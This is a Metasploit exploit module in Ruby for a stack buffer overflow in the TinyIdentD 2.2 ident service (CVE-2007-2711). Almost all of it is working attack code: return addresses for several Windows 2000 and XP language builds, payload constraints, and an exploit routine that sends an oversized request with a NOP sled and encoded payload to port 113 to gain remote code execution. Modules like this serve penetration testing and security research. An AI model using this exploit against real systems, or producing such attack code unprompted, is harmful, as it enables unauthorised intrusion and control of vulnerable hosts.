## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super( update_info( info, 'Name' => 'TinyIdentD 2.2 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone. }, 'Author' => [ 'Maarten Boone', # discovery 'Jacopo Cervini ', # metasploit ], 'References' => [ ['BID', '23981'], ['CVE', '2007-2711'], ['EDB', '3925'], ['OSVDB', '36053'], ], 'Payload' => { 'Space' => 450, 'BadChars' => "\x00\x0d\x20\x0a" }, 'Platform' => 'win', 'Targets' => [ ['Windows 2000 Server SP4 - English', { 'Ret' => 0x7c2d15e7 } ], # call esi ['Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll ['Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll ['Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll ['Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll ['Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll ['Windows XP SP2 - Italian', { 'Ret' => 0x77f46eda } ], # call esi ], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SERVICE_DOWN ], 'SideEffects' => UNKNOWN_SIDE_EFFECTS }, 'Privileged' => false, 'DisclosureDate' => '2007-05-14' ) ) register_options([ Opt::RPORT(113) ]) end def exploit connect print_status("Trying #{target.name} using address at #{'0x%.8x' % target.ret} ...") request = "\xeb\x20, 28 : USERID : UNIX :" request << make_nops(491 - payload.encoded.length) request << payload.encoded request << [ target.ret ].pack('V') request << "\n" sock.put(request) handler disconnect end end